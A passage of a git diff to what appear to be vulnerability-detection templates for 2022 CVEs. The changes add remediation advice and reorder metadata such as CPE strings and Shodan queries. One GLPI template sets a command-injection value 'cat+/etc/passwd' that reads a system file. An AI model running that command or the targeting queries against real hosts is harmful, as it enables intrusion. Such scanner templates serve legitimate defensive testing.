CVE-2022-34576 epss-score: 0.01703 - cpe: cpe:2.3:o:wavlink:wn535g3_firmware:m35g3r.v5030.180927:*:*:*:*:*:*:* epss-percentile: 0.86191 + cpe: cpe:2.3:o:wavlink:wn535g3_firmware:m35g3r.v5030.180927:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"Wavlink" verified: true + max-request: 1 vendor: wavlink product: wn535g3_firmware + shodan-query: http.html:"Wavlink" tags: cve,cve2022,wavlink,exposure http: diff --git a/http/cves/2022/CVE-2022-34590.yaml b/http/cves/2022/CVE-2022-34590.yaml index da0480fc05..8eb5c44bba 100644 --- a/http/cves/2022/CVE-2022-34590.yaml +++ b/http/cves/2022/CVE-2022-34590.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/admin.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/Renrao/bug_report/blob/master/blob/main/vendors/itsourcecode.com/hospital-management-system/sql_injection.md - https://nvd.nist.gov/vuln/detail/CVE-2022-34590 @@ -15,14 +17,14 @@ info: cve-id: CVE-2022-34590 cwe-id: CWE-89 epss-score: 0.00549 - cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.74559 + cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"Hospital Management System" verified: true + max-request: 1 vendor: hospital_management_system_project product: hospital_management_system + shodan-query: http.html:"Hospital Management System" tags: cve,cve2022,hms,cms,sqli http: diff --git a/http/cves/2022/CVE-2022-34753.yaml b/http/cves/2022/CVE-2022-34753.yaml index 7d76161ca1..9ed2db4094 100644 --- a/http/cves/2022/CVE-2022-34753.yaml +++ b/http/cves/2022/CVE-2022-34753.yaml @@ -6,6 +6,8 @@ info: severity: high description: | SpaceLogic C-Bus Home Controller through 1.31.460 is susceptible to remote command execution via improper neutralization of special elements. Remote root exploit can be enabled when the command is compromised, and an attacker can potentially execute malware, obtain sensitive information, modify data, and/or gain full control without entering necessary credentials. + remediation: | + Upgrade SpaceLogic C-Bus Home Controller to a version higher than 1.31.460 to mitigate this vulnerability. reference: - https://www.zeroscience.mk/codes/SpaceLogic.txt - https://download.schneider-electric.com/files?p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2022-193-02_SpaceLogic-C-Bus-Home-Controller-Wiser_MK2_Security_Notification.pdf @@ -17,13 +19,13 @@ info: cve-id: CVE-2022-34753 cwe-id: CWE-78 epss-score: 0.97007 - cpe: cpe:2.3:o:schneider-electric:spacelogic_c-bus_home_controller_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.99625 + cpe: cpe:2.3:o:schneider-electric:spacelogic_c-bus_home_controller_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: html:"SpaceLogic C-Bus" vendor: schneider-electric product: spacelogic_c-bus_home_controller_firmware + shodan-query: html:"SpaceLogic C-Bus" tags: cve,cve2022,iot,spacelogic,rce,oast,packetstorm http: diff --git a/http/cves/2022/CVE-2022-3484.yaml b/http/cves/2022/CVE-2022-3484.yaml index 60e1d35a5d..910cc72466 100644 --- a/http/cves/2022/CVE-2022-3484.yaml +++ b/http/cves/2022/CVE-2022-3484.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress wpb-show-core plugin through TODO contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of the WPB Show Core plugin, which includes a fix for the XSS vulnerability. reference: - https://wpscan.com/vulnerability/3afaed61-6187-4915-acf0-16e79d5c2464 - https://nvd.nist.gov/vuln/detail/CVE-2022-3484 @@ -15,15 +17,15 @@ info: cve-id: CVE-2022-3484 cwe-id: CWE-79 epss-score: 0.00071 - cpe: cpe:2.3:a:wpb_show_core_project:wpb_show_core:-:*:*:*:*:wordpress:*:* epss-percentile: 0.29012 + cpe: cpe:2.3:a:wpb_show_core_project:wpb_show_core:-:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - google-query: inurl:wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php - framework: wordpress + max-request: 1 vendor: wpb_show_core_project product: wpb_show_core + framework: wordpress + google-query: inurl:wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php tags: wpscan,cve,cve2022,wp-plugin,wp,wordpress,xss,wpb-show-core http: diff --git a/http/cves/2022/CVE-2022-3506.yaml b/http/cves/2022/CVE-2022-3506.yaml index a88a926ac6..7ed150f35d 100644 --- a/http/cves/2022/CVE-2022-3506.yaml +++ b/http/cves/2022/CVE-2022-3506.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Related Posts plugin prior to 2.1.3 contains a cross-site scripting vulnerability in the rp4wp[heading_text] parameter. User input is not properly sanitized, allowing the insertion of arbitrary code that can allow an attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of the WordPress Related Posts plugin (2.1.3 or higher) to mitigate the vulnerability. reference: - https://huntr.dev/bounties/08251542-88f6-4264-9074-a89984034828/ - https://huntr.dev/bounties/08251542-88f6-4264-9074-a89984034828 @@ -17,14 +19,14 @@ info: cve-id: CVE-2022-3506 cwe-id: CWE-79 epss-score: 0.00077 - cpe: cpe:2.3:a:never5:related_posts:*:*:*:*:*:wordpress:*:* epss-percentile: 0.31728 + cpe: cpe:2.3:a:never5:related_posts:*:*:*:*:*:wordpress:*:* metadata: - max-request: 4 verified: true - framework: wordpress + max-request: 4 vendor: never5 product: related_posts + framework: wordpress tags: wordpress,wp,wp-plugin,relatedposts,cve,cve2022,xss,authenticated,huntr http: diff --git a/http/cves/2022/CVE-2022-35151.yaml b/http/cves/2022/CVE-2022-35151.yaml index 182ce4a23a..460dcfcbe0 100644 --- a/http/cves/2022/CVE-2022-35151.yaml +++ b/http/cves/2022/CVE-2022-35151.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | kkFileView 4.1.0 contains multiple cross-site scripting vulnerabilities via the urls and currentUrl parameters at /controller/OnlinePreviewController.java. + remediation: | + To mitigate this vulnerability, it is recommended to update kkFileView to the latest version or apply a patch provided by the vendor. reference: - https://github.com/kekingcn/kkFileView/issues/366 - https://nvd.nist.gov/vuln/detail/CVE-2022-35151 @@ -15,14 +17,14 @@ info: cve-id: CVE-2022-35151 cwe-id: CWE-79 epss-score: 0.01162 - cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:* epss-percentile: 0.83115 + cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"kkFileView" verified: true + max-request: 1 vendor: keking product: kkfileview + shodan-query: http.html:"kkFileView" tags: cve,cve2022,xss,kkfileview http: diff --git a/http/cves/2022/CVE-2022-35405.yaml b/http/cves/2022/CVE-2022-35405.yaml index 821fc78078..1cd97a1d83 100644 --- a/http/cves/2022/CVE-2022-35405.yaml +++ b/http/cves/2022/CVE-2022-35405.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Zoho ManageEngine Password Manager Pro, PAM 360, and Access Manager Plus are susceptible to unauthenticated remote code execution via XML-RPC. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + remediation: | + Apply the latest security patch or update provided by Zoho ManageEngine to fix the vulnerability. reference: - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/zoho_password_manager_pro_xml_rpc_rce.rb - https://xz.aliyun.com/t/11578 @@ -18,13 +20,13 @@ info: cve-id: CVE-2022-35405 cwe-id: CWE-502 epss-score: 0.97514 - cpe: cpe:2.3:a:zohocorp:manageengine_access_manager_plus:*:*:*:*:*:*:*:* epss-percentile: 0.99972 + cpe: cpe:2.3:a:zohocorp:manageengine_access_manager_plus:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.title:"ManageEngine" vendor: zohocorp product: manageengine_access_manager_plus + shodan-query: http.title:"ManageEngine" tags: cve,cve2022,rce,zoho,passwordmanager,deserialization,unauth,msf,kev http: diff --git a/http/cves/2022/CVE-2022-35413.yaml b/http/cves/2022/CVE-2022-35413.yaml index 6e0066bfde..f97f03812e 100644 --- a/http/cves/2022/CVE-2022-35413.yaml +++ b/http/cves/2022/CVE-2022-35413.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WAPPLES Web Application Firewall through 6.0 contains a hardcoded credentials vulnerability. It contains a hardcoded system account accessible via db/wp.no1, as configured in the /opt/penta/wapples/script/wcc_auto_scaling.py file. An attacker can use this account to access system configuration and confidential information, such as SSL keys, via an HTTPS request to the /webapi/ URI on port 443 or 5001. + remediation: | + Upgrade to a version of WAPPLES Web Application Firewall that does not contain hardcoded credentials or apply the vendor-provided patch to fix the vulnerability. reference: - https://medium.com/@_sadshade/wapples-web-application-firewall-multiple-vulnerabilities-35bdee52c8fb - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35413 @@ -18,14 +20,14 @@ info: cve-id: CVE-2022-35413 cwe-id: CWE-798 epss-score: 0.82988 - cpe: cpe:2.3:a:pentasecurity:wapples:*:*:*:*:*:*:*:* epss-percentile: 0.97987 + cpe: cpe:2.3:a:pentasecurity:wapples:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.title:"Intelligent WAPPLES" verified: true + max-request: 1 vendor: pentasecurity product: wapples + shodan-query: http.title:"Intelligent WAPPLES" tags: cve,cve2022,wapples,firewall,default-login http: diff --git a/http/cves/2022/CVE-2022-35416.yaml b/http/cves/2022/CVE-2022-35416.yaml index 209a80100c..f05198b823 100644 --- a/http/cves/2022/CVE-2022-35416.yaml +++ b/http/cves/2022/CVE-2022-35416.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | H3C SSL VPN 2022-07-10 and prior contains a cookie-based cross-site scripting vulnerability in wnm/login/login.json svpnlang. + remediation: | + Apply the latest security patch or upgrade to a version of H3C SSL VPN that is not affected by this vulnerability. reference: - https://github.com/advisories/GHSA-9x76-78gc-r3m9 - https://github.com/Docker-droid/H3C_SSL_VPN_XSS @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-35416 cwe-id: CWE-79 epss-score: 0.00099 - cpe: cpe:2.3:a:h3c:ssl_vpn:*:*:*:*:*:*:*:* epss-percentile: 0.40272 + cpe: cpe:2.3:a:h3c:ssl_vpn:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html_hash:510586239 verified: true + max-request: 1 vendor: h3c product: ssl_vpn + shodan-query: http.html_hash:510586239 tags: cve,cve2022,xss,vpn,h3c http: diff --git a/http/cves/2022/CVE-2022-35493.yaml b/http/cves/2022/CVE-2022-35493.yaml index 42c362c0dd..102e3eca3f 100644 --- a/http/cves/2022/CVE-2022-35493.yaml +++ b/http/cves/2022/CVE-2022-35493.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | eShop 3.0.4 contains a reflected cross-site scripting vulnerability in json search parse and json response in wrteam.in. + remediation: | + To remediate this issue, the application should implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: - https://github.com/Keyvanhardani/Exploit-eShop-Multipurpose-Ecommerce-Store-Website-3.0.4-Cross-Site-Scripting-XSS/blob/main/README.md - https://nvd.nist.gov/vuln/detail/CVE-2022-35493 @@ -15,14 +17,14 @@ info: cve-id: CVE-2022-35493 cwe-id: CWE-79 epss-score: 0.00134 - cpe: cpe:2.3:a:wrteam:eshop_-_ecommerce_\/_store_website:*:*:*:*:*:*:*:* epss-percentile: 0.47885 + cpe: cpe:2.3:a:wrteam:eshop_-_ecommerce_\/_store_website:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"eShop - Multipurpose Ecommerce" verified: true + max-request: 1 vendor: wrteam product: eshop_-_ecommerce_\/_store_website + shodan-query: http.html:"eShop - Multipurpose Ecommerce" tags: cve,cve2022,eshop,xss http: diff --git a/http/cves/2022/CVE-2022-3578.yaml b/http/cves/2022/CVE-2022-3578.yaml index d54c4959c0..288a7e6a0f 100644 --- a/http/cves/2022/CVE-2022-3578.yaml +++ b/http/cves/2022/CVE-2022-3578.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress ProfileGrid plugin prior to 5.1.1 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update WordPress ProfileGrid to version 5.1.1 or later to mitigate the XSS vulnerability. reference: - https://wpscan.com/vulnerability/17596b0e-ff45-4d0c-8e57-a31101e30345 - https://wordpress.org/plugins/profilegrid-user-profiles-groups-and-communities/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-3578 cwe-id: CWE-79 epss-score: 0.00071 - cpe: cpe:2.3:a:metagauss:profilegrid:*:*:*:*:*:wordpress:*:* epss-percentile: 0.29012 + cpe: cpe:2.3:a:metagauss:profilegrid:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: metagauss product: profilegrid + framework: wordpress tags: wp-plugin,wordpress,wpscan,cve,wp,xss,profilegrid,authenticated,cve2022 http: diff --git a/http/cves/2022/CVE-2022-35914.yaml b/http/cves/2022/CVE-2022-35914.yaml index b5a822aea4..df730555e2 100644 --- a/http/cves/2022/CVE-2022-35914.yaml +++ b/http/cves/2022/CVE-2022-35914.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | GLPI through 10.0.2 is susceptible to remote command execution injection in /vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module. + remediation: | + Upgrade GLPI to a version higher than 10.0.2 to mitigate this vulnerability. reference: - https://mayfly277.github.io/posts/GLPI-htmlawed-CVE-2022-35914 - https://github.com/cosad3s/CVE-2022-35914-poc @@ -18,14 +20,14 @@ info: cve-id: CVE-2022-35914 cwe-id: CWE-74 epss-score: 0.9739 - cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* epss-percentile: 0.9987 + cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.favicon.hash:"-1474875778" verified: true + max-request: 1 vendor: glpi-project product: glpi + shodan-query: http.favicon.hash:"-1474875778" tags: cve,cve2022,glpi,rce,kev variables: cmd: "cat+/etc/passwd" diff --git a/http/cves/2022/CVE-2022-36446.yaml b/http/cves/2022/CVE-2022-36446.yaml index b643a496a5..a7f33dfe14 100644 --- a/http/cves/2022/CVE-2022-36446.yaml +++ b/http/cves/2022/CVE-2022-36446.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Webmin before 1.997 is susceptible to authenticated remote code execution via software/apt-lib.pl, which lacks HTML escaping for a UI command. An attacker can perform command injection attacks and thereby execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + remediation: | + Upgrade Webmin to version 1.997 or later to mitigate this vulnerability. reference: - https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165 - https://www.exploit-db.com/exploits/50998 @@ -18,13 +20,13 @@ info: cve-id: CVE-2022-36446 cwe-id: CWE-116 epss-score: 0.97228 - cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:* epss-percentile: 0.99749 + cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: title:"Webmin" vendor: webmin product: webmin + shodan-query: title:"Webmin" tags: packetstorm,cve2022,webmin,rce,authenticated,edb,cve http: diff --git a/http/cves/2022/CVE-2022-36537.yaml b/http/cves/2022/CVE-2022-36537.yaml index 352b581f87..665248998f 100644 --- a/http/cves/2022/CVE-2022-36537.yaml +++ b/http/cves/2022/CVE-2022-36537.yaml @@ -6,6 +6,8 @@ info: severity: high description: | ZK Framework 9.6.1, 9.6.0.1, 9.5.1.3, 9.0.1.2 and 8.6.4.1 is susceptible to information disclosure. An attacker can access sensitive information via a crafted POST request to the component AuUploader and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the latest security patches or updates provided by the ZK Framework to fix the information disclosure vulnerability. reference: - https://github.com/Malwareman007/CVE-2022-36537/ - https://tracker.zkoss.org/browse/ZK-5150 @@ -17,14 +19,14 @@ info: cve-id: CVE-2022-36537 cwe-id: CWE-200 epss-score: 0.96802 - cpe: cpe:2.3:a:zkoss:zk_framework:*:*:*:*:*:*:*:* epss-percentile: 0.99539 + cpe: cpe:2.3:a:zkoss:zk_framework:*:*:*:*:*:*:*:* metadata: - max-request: 2 - shodan-query: http.title:"Server backup manager" verified: true + max-request: 2 vendor: zkoss product: zk_framework + shodan-query: http.title:"Server backup manager" tags: cve,cve2022,zk-framework,exposure,unauth,kev,intrusive http: diff --git a/http/cves/2022/CVE-2022-36642.yaml b/http/cves/2022/CVE-2022-36642.yaml index 9cf183f1b2..a91bab8cdd 100644 --- a/http/cves/2022/CVE-2022-36642.yaml +++ b/http/cves/2022/CVE-2022-36642.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Telos Alliance Omnia MPX Node through 1.5.0+r1 is vulnerable to local file inclusion via logs/downloadMainLog. By retrieving userDB.json allows an attacker to retrieve cleartext credentials and escalate privileges via the control panel. + remediation: | + Apply the latest security patch or upgrade to a non-vulnerable version of Omnia MPX. reference: - https://www.exploit-db.com/exploits/50996 - https://cyber-guy.gitbook.io/cyber-guy/pocs/omnia-node-mpx-auth-bypass-via-lfd @@ -17,14 +19,14 @@ info: cve-id: CVE-2022-36642 cwe-id: CWE-862 epss-score: 0.74091 - cpe: cpe:2.3:o:telosalliance:omnia_mpx_node_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.97696 + cpe: cpe:2.3:o:telosalliance:omnia_mpx_node_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 2 - shodan-query: http.title:"Omnia MPX Node | Login" verified: true + max-request: 2 vendor: telosalliance product: omnia_mpx_node_firmware + shodan-query: http.title:"Omnia MPX Node | Login" tags: traversal,omnia,edb,cve,cve2022,lfi http: diff --git a/http/cves/2022/CVE-2022-36804.yaml b/http/cves/2022/CVE-2022-36804.yaml index 1c310ff8b2..ee277ea98c 100644 --- a/http/cves/2022/CVE-2022-36804.yaml +++ b/http/cves/2022/CVE-2022-36804.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Atlassian Bitbucket Server and Data Center is susceptible to remote command injection. Multiple API endpoints can allow an attacker with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request, thus making it possible to obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. Affected versions are 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1. + remediation: | + Apply the latest security patches provided by Atlassian to mitigate the vulnerability. reference: - https://github.com/notdls/CVE-2022-36804 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36804 @@ -18,13 +20,13 @@ info: cve-id: CVE-2022-36804 cwe-id: CWE-77 epss-score: 0.97338 - cpe: cpe:2.3:a:atlassian:bitbucket:*:*:*:*:*:*:*:* epss-percentile: 0.99822 + cpe: cpe:2.3:a:atlassian:bitbucket:*:*:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: http.component:"BitBucket" vendor: atlassian product: bitbucket + shodan-query: http.component:"BitBucket" tags: packetstorm,cve,cve2022,bitbucket,atlassian,kev variables: data: '{{rand_base(5)}}' diff --git a/http/cves/2022/CVE-2022-36883.yaml b/http/cves/2022/CVE-2022-36883.yaml index 837a4b7639..4e0349e132 100644 --- a/http/cves/2022/CVE-2022-36883.yaml +++ b/http/cves/2022/CVE-2022-36883.yaml @@ -5,6 +5,8 @@ info: author: c-sh0 severity: high description: Jenkins Git plugin through 4.11.3 contains a missing authorization check. An attacker can trigger builds of jobs configured to use an attacker-specified Git repository and to cause them to check out an attacker-specified commit. This can make it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade to a fixed version of the Jenkins Git plugin (>=4.11.4) or apply the provided patch to mitigate the vulnerability. reference: - https://www.jenkins.io/security/advisory/2022-07-27/#SECURITY-284 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-36883 @@ -16,15 +18,15 @@ info: cve-id: CVE-2022-36883 cwe-id: CWE-862 epss-score: 0.01083 - cpe: cpe:2.3:a:jenkins:git:*:*:*:*:*:jenkins:*:* epss-percentile: 0.825 + cpe: cpe:2.3:a:jenkins:git:*:*:*:*:*:jenkins:*:* metadata: - max-request: 1 - shodan-query: X-Jenkins verified: true - framework: jenkins + max-request: 1 vendor: jenkins product: git + framework: jenkins + shodan-query: X-Jenkins tags: cve,cve2022,jenkins,plugin,git,intrusive http: diff --git a/http/cves/2022/CVE-2022-37042.yaml b/http/cves/2022/CVE-2022-37042.yaml index 6990e10e4e..fd83b5a5bc 100644 --- a/http/cves/2022/CVE-2022-37042.yaml +++ b/http/cves/2022/CVE-2022-37042.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. By bypassing authentication (i.e., not having an authtoken), an attacker can upload arbitrary files to the system, leading to directory traversal and remote code execution. NOTE: this issue exists because of an incomplete fix for CVE-2022-27925. + remediation: | + Apply the latest security patches or upgrade to a non-vulnerable version of Zimbra Collaboration Suite. reference: - https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/ - https://blog.zimbra.com/2022/08/authentication-bypass-in-mailboximportservlet-vulnerability/ @@ -18,14 +20,14 @@ info: cve-id: CVE-2022-37042 cwe-id: CWE-22 epss-score: 0.97489 - cpe: cpe:2.3:a:zimbra:collaboration:8.8.15:-:*:*:*:*:*:* epss-percentile: 0.99954 + cpe: cpe:2.3:a:zimbra:collaboration:8.8.15:-:*:*:*:*:*:* metadata: max-request: 4 - fofa-query: app="zimbra-邮件系统" - shodan-query: http.favicon.hash:"1624375939" vendor: zimbra product: collaboration + shodan-query: http.favicon.hash:"1624375939" + fofa-query: app="zimbra-邮件系统" tags: cve,cve2022,zimbra,rce,unauth,kev http: diff --git a/http/cves/2022/CVE-2022-37153.yaml b/http/cves/2022/CVE-2022-37153.yaml index 887d7f8504..109f896902 100644 --- a/http/cves/2022/CVE-2022-37153.yaml +++ b/http/cves/2022/CVE-2022-37153.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Artica Proxy 4.30.000000 contains a cross-site scripting vulnerability via the password parameter in /fw.login.php. + remediation: | + Upgrade to a patched version of Artica Proxy or apply the vendor-supplied patch to mitigate the vulnerability. reference: - https://github.com/Fjowel/CVE-2022-37153 - https://nvd.nist.gov/vuln/detail/CVE-2022-37153 @@ -15,14 +17,14 @@ info: cve-id: CVE-2022-37153 cwe-id: CWE-79 epss-score: 0.00116 - cpe: cpe:2.3:a:articatech:artica_proxy:4.30.000000:*:*:*:*:*:*:* epss-percentile: 0.44709 + cpe: cpe:2.3:a:articatech:artica_proxy:4.30.000000:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"Artica" verified: true + max-request: 1 vendor: articatech product: artica_proxy + shodan-query: http.html:"Artica" tags: cve,cve2022,xss,artica http: diff --git a/http/cves/2022/CVE-2022-37190.yaml b/http/cves/2022/CVE-2022-37190.yaml index ff723c273f..22642b90fc 100644 --- a/http/cves/2022/CVE-2022-37190.yaml +++ b/http/cves/2022/CVE-2022-37190.yaml @@ -6,6 +6,8 @@ info: severity: high description: | CuppaCMS 1.0 is vulnerable to Remote Code Execution (RCE). An authenticated user can control both parameters (action and function) from "/api/index.php. + remediation: | + Apply the latest security patch or update to a patched version of Cuppa CMS v1.0 to mitigate this vulnerability. reference: - https://github.com/CuppaCMS/CuppaCMS - https://nvd.nist.gov/vuln/detail/CVE-2022-37190 @@ -15,11 +17,11 @@ info: cve-id: CVE-2022-37190 cwe-id: CWE-732 epss-score: 0.01712 - cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* epss-percentile: 0.86233 + cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true + max-request: 3 vendor: cuppacms product: cuppacms tags: cve,cve2022,rce,cuppa,authenticated diff --git a/http/cves/2022/CVE-2022-37191.yaml b/http/cves/2022/CVE-2022-37191.yaml index 5cd541edac..21bb7f0720 100644 --- a/http/cves/2022/CVE-2022-37191.yaml +++ b/http/cves/2022/CVE-2022-37191.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The component "cuppa/api/index.php" of CuppaCMS v1.0 is Vulnerable to LFI. An authenticated user can read system files via crafted POST request using [function] parameter value as LFI payload. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the authenticated local file inclusion vulnerability in Cuppa CMS v1.0. reference: - https://github.com/CuppaCMS/CuppaCMS - https://nvd.nist.gov/vuln/detail/CVE-2022-37191 @@ -15,11 +17,11 @@ info: cve-id: CVE-2022-37191 cwe-id: CWE-829 epss-score: 0.28873 - cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* epss-percentile: 0.96273 + cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true + max-request: 3 vendor: cuppacms product: cuppacms tags: cve,cve2022,lfi,cuppa,authenticated diff --git a/http/cves/2022/CVE-2022-37299.yaml b/http/cves/2022/CVE-2022-37299.yaml index fb518cf237..e49f389f39 100644 --- a/http/cves/2022/CVE-2022-37299.yaml +++ b/http/cves/2022/CVE-2022-37299.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Shirne CMS 1.2.0 is vulnerable to local file inclusion which could cause arbitrary file read via /static/ueditor/php/controller.php. + remediation: | + Upgrade to the latest version of Shirne CMS or apply the vendor-provided patch to mitigate the LFI vulnerability. reference: - https://twitter.com/pikpikcu/status/1568316864690028544 - https://gitee.com/shirnecn/ShirneCMS/issues/I5JRHJ?from=project-issue @@ -15,11 +17,11 @@ info: cve-id: CVE-2022-37299 cwe-id: CWE-22 epss-score: 0.00519 - cpe: cpe:2.3:a:shirne_cms_project:shirne_cms:1.2.0:*:*:*:*:*:*:* epss-percentile: 0.73813 + cpe: cpe:2.3:a:shirne_cms_project:shirne_cms:1.2.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: shirne_cms_project product: shirne_cms tags: cve,cve2022,shirnecms,lfi diff --git a/http/cves/2022/CVE-2022-3768.yaml b/http/cves/2022/CVE-2022-3768.yaml index 5efa90291e..34e1ef91de 100644 --- a/http/cves/2022/CVE-2022-3768.yaml +++ b/http/cves/2022/CVE-2022-3768.yaml @@ -6,26 +6,26 @@ info: severity: high description: | WordPress WPSmartContracts plugin before 1.3.12 contains a SQL injection vulnerability. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement. An attacker with a role as low as author can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + remediation: Fixed in version 1.3.12 reference: - https://wpscan.com/vulnerability/1d8bf5bb-5a17-49b7-a5ba-5f2866e1f8a3 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3768 - https://cve.report/CVE-2022-3768 - https://bulletin.iese.de/post/wp-smart-contracts_1-3-11/ - remediation: Fixed in version 1.3.12 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-3768 cwe-id: CWE-89 epss-score: 0.02138 - cpe: cpe:2.3:a:wpsmartcontracts:wpsmartcontracts:*:*:*:*:*:wordpress:*:* epss-percentile: 0.87828 + cpe: cpe:2.3:a:wpsmartcontracts:wpsmartcontracts:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: wpsmartcontracts product: wpsmartcontracts + framework: wordpress tags: wp-smart-contracts,wpscan,cve,wp-plugin,sqli,wordpress,cve2022,wp,authenticated http: diff --git a/http/cves/2022/CVE-2022-3800.yaml b/http/cves/2022/CVE-2022-3800.yaml index 9c45e18369..3c2bbcc7a2 100644 --- a/http/cves/2022/CVE-2022-3800.yaml +++ b/http/cves/2022/CVE-2022-3800.yaml @@ -6,6 +6,8 @@ info: severity: high description: | IBAX go-ibax functionality is susceptible to SQL injection via the file /api/v2/open/rowsInfo. The manipulation of the argument table_name leads to SQL injection, and the attack may be launched remotely. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries. Implement parameterized queries or use an ORM framework to prevent SQL injection attacks. reference: - https://github.com/IBAX-io/go-ibax/issues/2061 - https://vuldb.com/?id.212636 @@ -16,8 +18,8 @@ info: cve-id: CVE-2022-3800 cwe-id: CWE-89,CWE-707 epss-score: 0.04587 - cpe: cpe:2.3:a:ibax:go-ibax:-:*:*:*:*:*:*:* epss-percentile: 0.91474 + cpe: cpe:2.3:a:ibax:go-ibax:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ibax diff --git a/http/cves/2022/CVE-2022-38295.yaml b/http/cves/2022/CVE-2022-38295.yaml index 